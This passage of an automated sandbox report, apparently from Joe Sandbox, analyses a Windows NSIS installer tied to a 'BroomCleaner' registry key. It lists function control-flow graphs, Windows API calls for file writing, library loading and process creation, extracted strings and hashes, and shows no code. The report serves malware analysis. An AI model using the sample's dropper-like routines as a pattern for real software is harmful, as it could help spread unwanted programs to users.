                                                                                                                            • Associated: 00000015.00000002.2613749484.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613787241.000000000040A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613802991.000000000040B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000412000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000041E000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000042A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000434000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000437000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.0000000000438000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.000000000043C000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_21_2_400000_3cs4PKncIzTPVTZHP3GDsO8B.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$Create$AllocAttributesCharCountDestroyGlobalModuleNamePrevReadSizeTickWindowlstrcpynlstrlen
                                                                                                                            • String ID: 8_o$@$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$d`o$soft
                                                                                                                            • API String ID: 3119619987-3047085808
                                                                                                                            • Opcode ID: 4fc0a7fd32f7e4debefb30af515cdd6f92a2255b0d2dd10cb1272751b383b930
                                                                                                                            • Instruction ID: b38f96b7e78b57fcd3b2806388120572df800b880dbb1f433db2e5bcd9a6e09c
                                                                                                                            • Opcode Fuzzy Hash: 4fc0a7fd32f7e4debefb30af515cdd6f92a2255b0d2dd10cb1272751b383b930
                                                                                                                            • Instruction Fuzzy Hash: 1791A4B09083048FD720AF29D98576EBBF4EF84318F41847EE584A7291D77C9985CF9A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00401B06 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 185timeCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • CompareFileTime.KERNEL32(?,00000000), ref: 00401BA1
                                                                                                                              • Part of subcall function 00407CB6: lstrcpynA.KERNEL32(?,?,?,?,?,?,00404457), ref: 00407CD1
                                                                                                                              • Part of subcall function 00407836: MessageBoxIndirectA.USER32 ref: 00407899
                                                                                                                              • Part of subcall function 00406FCB: SetWindowTextA.USER32 ref: 00407061
                                                                                                                              • Part of subcall function 00406FCB: SendMessageA.USER32 ref: 004070A1
                                                                                                                              • Part of subcall function 00406FCB: SendMessageA.USER32 ref: 004070CF
                                                                                                                              • Part of subcall function 00406FCB: SendMessageA.USER32 ref: 004070EE
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000015.00000002.2613767067.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000015.00000002.2613749484.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613787241.000000000040A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613802991.000000000040B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000412000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000041E000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000042A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000434000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000437000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.0000000000438000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.000000000043C000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_21_2_400000_3cs4PKncIzTPVTZHP3GDsO8B.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Message$Send$CompareFileIndirectTextTimeWindowlstrcpyn
                                                                                                                            • String ID: 62lP/4uOUYfKA3tfxllnPzQXGLJgRjFKHZbIa8JtXF+oMlF4/GglqDQr8FrkYyAg2UYkxW9kefTa$Installed$SOFTWARE\BroomCleaner
                                                                                                                            • API String ID: 645384303-3819460243
                                                                                                                            • Opcode ID: 79a18232532a1a7469df17609bd74b415ce06eee5835288b4c7b757715615148
                                                                                                                            • Instruction ID: b5f2e25a14bd4d2b29e972ea4905dfdb01325226fa6e36a277c804736715cb88
                                                                                                                            • Opcode Fuzzy Hash: 79a18232532a1a7469df17609bd74b415ce06eee5835288b4c7b757715615148
                                                                                                                            • Instruction Fuzzy Hash: 71614FB09087009ED710BF65CA45A6FBAF8EF80714F018A2FF4C4A7291D77C58818B6B
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00403D52 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 118fileCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 448 403d52-403d60 449 403d92-403da3 call 403b63 448->449 450 403d62-403d8f SetFilePointer 448->450 453 403ef7-403f00 449->453 454 403da9-403ddc ReadFile 449->454 450->449 455 403de2-403de6 454->455 456 403ea8-403ead 454->456 455->456 457 403dec-403e05 call 403b63 455->457 456->453 457->453 460 403e0b-403e0f 457->460 461 403e15-403e18 460->461 462 403eba-403eec ReadFile 460->462 463 403e64-403e69 461->463 462->456 464 403eee-403ef1 462->464 465 403eb6-403eb8 463->465 466 403e6b-403ea2 ReadFile 463->466 464->453 465->453 466->456 467 403e1a-403e1d 466->467 467->456 468 403e23-403e4f WriteFile 467->468 469 403e51-403e54 468->469 470 403eaf-403eb4 468->470 469->470 471 403e56-403e62 469->471 470->453 471->463
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000015.00000002.2613767067.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000015.00000002.2613749484.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613787241.000000000040A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613802991.000000000040B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000412000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000041E000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000042A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000434000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000437000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.0000000000438000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.000000000043C000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_21_2_400000_3cs4PKncIzTPVTZHP3GDsO8B.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$Read$PointerWrite
                                                                                                                            • String ID: PB@
                                                                                                                            • API String ID: 2113905535-661560245
                                                                                                                            • Opcode ID: c65ee0b9422e546ce60fc59843fb5b504002c352310d15ee9ec7ff5b6d871d70
                                                                                                                            • Instruction ID: 6b6e275f29c4804299ca632934389f045b276b78e87a5faa28d99019ded5aa05
                                                                                                                            • Opcode Fuzzy Hash: c65ee0b9422e546ce60fc59843fb5b504002c352310d15ee9ec7ff5b6d871d70
                                                                                                                            • Instruction Fuzzy Hash: DC41FAB0A043059FDB10DF69C98479EBBF4FF84355F50893AE854A3290D378D9458B9A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00402860 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 92libraryloaderCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 472 402860-402863 473 402869-40288e call 401400 * 2 472->473 474 40297c-402983 472->474 484 402890-4028b0 LoadLibraryExA 473->484 485 4028b8-4028c6 GetModuleHandleA 473->485 475 402a36-402a41 call 40163b 474->475 483 403831-403842 475->483 486 402970-402977 484->486 487 4028b6 484->487 485->484 489 4028c8-4028db GetProcAddress 485->489 486->475 487->489 491 40292d-40293f call 406fcb 489->491 492 4028dd-4028e5 489->492 500 402944-40294b 491->500 493 4028e7-4028fc call 40163b 492->493 494 4028fe-40292b 492->494 493->500 494->500 500->483 501 402951-40295c call 404a27 500->501 501->483 505 402962-40296b FreeLibrary 501->505 506 403677-403678 505->506 506->483
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            • @es, xrefs: 0040290C
                                                                                                                            • 62lP/4uOUYfKA3tfxllnPzQXGLJgRjFKHZbIa8JtXF+oMlF4/GglqDQr8FrkYyAg2UYkxW9kefTa, xrefs: 00402914
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000015.00000002.2613767067.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000015.00000002.2613749484.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613787241.000000000040A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613802991.000000000040B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000412000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000041E000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000042A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000434000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000437000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.0000000000438000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.000000000043C000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_21_2_400000_3cs4PKncIzTPVTZHP3GDsO8B.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Library$AddressFreeHandleLoadModuleProc
                                                                                                                            • String ID: 62lP/4uOUYfKA3tfxllnPzQXGLJgRjFKHZbIa8JtXF+oMlF4/GglqDQr8FrkYyAg2UYkxW9kefTa$@es
                                                                                                                            • API String ID: 1437655972-850321180
                                                                                                                            • Opcode ID: 1b6a0fabb82879a4a9aeeaa7f443e577fde00d5210071419eec9afd89e7f40fe
                                                                                                                            • Instruction ID: e70ddef41f08cbfaa68bc2c18546323f80d3119e0e26b2f1059722deacc19af5
                                                                                                                            • Opcode Fuzzy Hash: 1b6a0fabb82879a4a9aeeaa7f443e577fde00d5210071419eec9afd89e7f40fe
                                                                                                                            • Instruction Fuzzy Hash: E2318FB16083009FD7106F258D4876EBAE8BF84764F51893FE485A33D0D7B88886DB1A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00403B63 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 115fileCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 507 403b63-403b8d GetTickCount 508 403b93-403be0 call 403b31 SetFilePointer 507->508 509 403d35-403d43 call 4039fe 507->509 515 403be3-403c11 call 403ae9 508->515 514 403d48-403d4f 509->514 518 403d45 515->518 519 403c17-403c27 515->519 518->514 520 403c2d-403c34 519->520 521 403c36-403c3d 520->521 522 403c68-403c88 call 40893d 520->522 521->522 523 403c3f-403c63 call 4039fe 521->523 527 403c8a-403c96 522->527 528 403cec-403cf1 522->528 523->522 529 403c98-403cc3 WriteFile 527->529 530 403cdf-403ce6 527->530 528->514 531 403cf3-403cf8 529->531 532 403cc5-403cc8 529->532 530->528 533 403ce8-403cea 530->533 531->514 532->531 534 403cca-403cd7 532->534 533->528 535 403cfa-403d0d 533->535 534->520 537 403cdd 534->537 535->515 536 403d13-403d32 SetFilePointer 535->536 536->509 537->535
                                                                                                                            APIs
                                                                                                                            • GetTickCount.KERNEL32 ref: 00403B7B
                                                                                                                              • Part of subcall function 00403B31: SetFilePointer.KERNEL32 ref: 00403B56
                                                                                                                            • SetFilePointer.KERNEL32 ref: 00403BCB
                                                                                                                              • Part of subcall function 00403AE9: ReadFile.KERNEL32 ref: 00403B15
                                                                                                                            • WriteFile.KERNEL32 ref: 00403CB8
                                                                                                                            • SetFilePointer.KERNEL32 ref: 00403D2F
                                                                                                                              • Part of subcall function 004039FE: DestroyWindow.USER32 ref: 00403A17
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000015.00000002.2613767067.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000015.00000002.2613749484.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613787241.000000000040A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613802991.000000000040B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000412000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000041E000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000042A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000434000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000437000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.0000000000438000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.000000000043C000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_21_2_400000_3cs4PKncIzTPVTZHP3GDsO8B.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$Pointer$CountDestroyReadTickWindowWrite
                                                                                                                            • String ID: 8_o
                                                                                                                            • API String ID: 1725291646-890720360
                                                                                                                            • Opcode ID: 18ae4545f5b30c3c28caf4f3d11ae2cad8807af871cef0b76668dc3cb6943506
                                                                                                                            • Instruction ID: f7083fb0e86bb6005b9bf14dc6a8331a2f5849a6e81c63e88d49bae7df8a1a75
                                                                                                                            • Opcode Fuzzy Hash: 18ae4545f5b30c3c28caf4f3d11ae2cad8807af871cef0b76668dc3cb6943506
                                                                                                                            • Instruction Fuzzy Hash: D3514AB1A183049FD720DF29E88532A7BB4FF44355F90893EE844A72A0D7789546CF9E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040820E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35libraryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 538 40820e-40823a GetSystemDirectoryA 539 40824b-40824d 538->539 540 40823c-408249 538->540 541 408252-408296 wsprintfA LoadLibraryExA 539->541 540->541
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000015.00000002.2613767067.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000015.00000002.2613749484.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613787241.000000000040A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613802991.000000000040B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000412000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000041E000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000042A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000434000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000437000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.0000000000438000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.000000000043C000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_21_2_400000_3cs4PKncIzTPVTZHP3GDsO8B.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                            • String ID: \$C@
                                                                                                                            • API String ID: 2200240437-1790911818
                                                                                                                            • Opcode ID: c9660503d559c2df304355e59e8a4c4b93ddf83edb93a1dccef26b9b85dfc474
                                                                                                                            • Instruction ID: 6c0f10e39fe67b0a46f2467a814b7d530fefee384e0f0f9ebaf92f9caf306ff0
                                                                                                                            • Opcode Fuzzy Hash: c9660503d559c2df304355e59e8a4c4b93ddf83edb93a1dccef26b9b85dfc474
                                                                                                                            • Instruction Fuzzy Hash: 3D014BB1508704AFD300EF68D98879EBBF4FB84308F54C83DD08996295D7789589CB5A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00408299 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 31libraryloaderCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 542 408299-4082b9 GetModuleHandleA 543 4082bb-4082be call 40820e 542->543 544 4082cc-4082e1 GetProcAddress 542->544 547 4082c3-4082ca 543->547 545 4082e2-4082e8 544->545 547->544 547->545
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleA.KERNEL32(?,?,004043E5), ref: 004082AE
                                                                                                                            • GetProcAddress.KERNEL32 ref: 004082DA
                                                                                                                              • Part of subcall function 0040820E: GetSystemDirectoryA.KERNEL32 ref: 00408229
                                                                                                                              • Part of subcall function 0040820E: wsprintfA.USER32 ref: 00408270
                                                                                                                              • Part of subcall function 0040820E: LoadLibraryExA.KERNEL32 ref: 00408289
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000015.00000002.2613767067.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000015.00000002.2613749484.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613787241.000000000040A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613802991.000000000040B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000412000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000041E000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000042A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000434000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000437000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.0000000000438000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.000000000043C000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_21_2_400000_3cs4PKncIzTPVTZHP3GDsO8B.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                            • String ID: UXTHEME$C@$C@
                                                                                                                            • API String ID: 2547128583-1808485004
                                                                                                                            • Opcode ID: f6ce91f65d8d9bb7ee18f4d542f9107f4d6a72ffda61794c9569e264c57c3d17
                                                                                                                            • Instruction ID: 23c7ce911dd590b504e17f07e60dbba2231cf2c7d4590c8d4e2d2ec4458658d6
                                                                                                                            • Opcode Fuzzy Hash: f6ce91f65d8d9bb7ee18f4d542f9107f4d6a72ffda61794c9569e264c57c3d17
                                                                                                                            • Instruction Fuzzy Hash: 8AF08275A00A089BD710AF65D98446FBBF8FB88750B01C47DF98493324EA3499608B9A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00402613 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66synchronizationCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 548 402613-402637 call 401400 call 406fcb call 407779 554 40263c-402641 548->554 555 402647-40264e 554->555 556 402a3c-402a41 554->556 558 402650 555->558 559 4026b3-4026b5 555->559 557 403831-403842 556->557 561 402656-40266a WaitForSingleObject 558->561 560 4026c5-4026ce CloseHandle 559->560 560->556 563 403677-403678 560->563 564 40267b-402697 GetExitCodeProcess 561->564 565 40266c-402679 call 408848 561->565 563->557 568 4026b7-4026c3 564->568 569 402699-4026b2 call 407be3 564->569 565->561 568->560 569->559
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00406FCB: SetWindowTextA.USER32 ref: 00407061
                                                                                                                              • Part of subcall function 00406FCB: SendMessageA.USER32 ref: 004070A1
                                                                                                                              • Part of subcall function 00406FCB: SendMessageA.USER32 ref: 004070CF
                                                                                                                              • Part of subcall function 00406FCB: SendMessageA.USER32 ref: 004070EE
                                                                                                                              • Part of subcall function 00407779: CreateProcessA.KERNEL32 ref: 004077D6
                                                                                                                              • Part of subcall function 00407779: CloseHandle.KERNEL32 ref: 004077EB
                                                                                                                            • WaitForSingleObject.KERNEL32 ref: 00402661
                                                                                                                            • GetExitCodeProcess.KERNEL32 ref: 00402688
                                                                                                                              • Part of subcall function 00408848: PeekMessageA.USER32 ref: 00408878
                                                                                                                              • Part of subcall function 00408848: DispatchMessageA.USER32 ref: 00408884
                                                                                                                            • CloseHandle.KERNEL32 ref: 004026C8
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000015.00000002.2613767067.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000015.00000002.2613749484.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613787241.000000000040A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613802991.000000000040B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000412000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000041E000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000042A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000434000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000437000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.0000000000438000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.000000000043C000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_21_2_400000_3cs4PKncIzTPVTZHP3GDsO8B.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Message$Send$CloseHandleProcess$CodeCreateDispatchExitObjectPeekSingleTextWaitWindow
                                                                                                                            • String ID: d
                                                                                                                            • API String ID: 3753073698-2564639436
                                                                                                                            • Opcode ID: 9343e43865e4207d9138f12a8f752cf886ae069070fe727ca0ca3e2bbeffcac1
                                                                                                                            • Instruction ID: ac6e98feb3a7424ea682bb54f7c96fcb1bdc6a13fb689d46f8fa2a7810285b5b
                                                                                                                            • Opcode Fuzzy Hash: 9343e43865e4207d9138f12a8f752cf886ae069070fe727ca0ca3e2bbeffcac1
                                                                                                                            • Instruction Fuzzy Hash: 4C218171908600DFD750AF25CD48BAEB7E5EB84315F51887EE489A3380D6795981CF2A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004076B0 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 573 4076b0-40770e CreateDirectoryA 574 407710-407712 573->574 575 407714-407721 GetLastError 573->575 576 407741-407748 574->576 575->576 577 407723-40773d SetFileSecurityA 575->577 577->574 578 40773f GetLastError 577->578 578->576
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000015.00000002.2613767067.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000015.00000002.2613749484.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613787241.000000000040A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613802991.000000000040B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000412000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000041E000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000042A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000434000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000437000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.0000000000438000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.000000000043C000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_21_2_400000_3cs4PKncIzTPVTZHP3GDsO8B.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3449924974-0
                                                                                                                            • Opcode ID: 2da82589d8da42b9739c6c0976e1894f0ad9be4ebc54cecaf41c4c862e70e725
                                                                                                                            • Instruction ID: 0b729d7567636c09f29e4728680a85774f46e6e2b236e770b8bd2138b4be8b02
                                                                                                                            • Opcode Fuzzy Hash: 2da82589d8da42b9739c6c0976e1894f0ad9be4ebc54cecaf41c4c862e70e725
                                                                                                                            • Instruction Fuzzy Hash: 0B110CB1D04208DEDB109FA9D8447DEBFB4EF94354F10882AE944B7250D3796545CBAE
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00408D43 Relevance: 5.5, APIs: 4, Instructions: 458memoryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
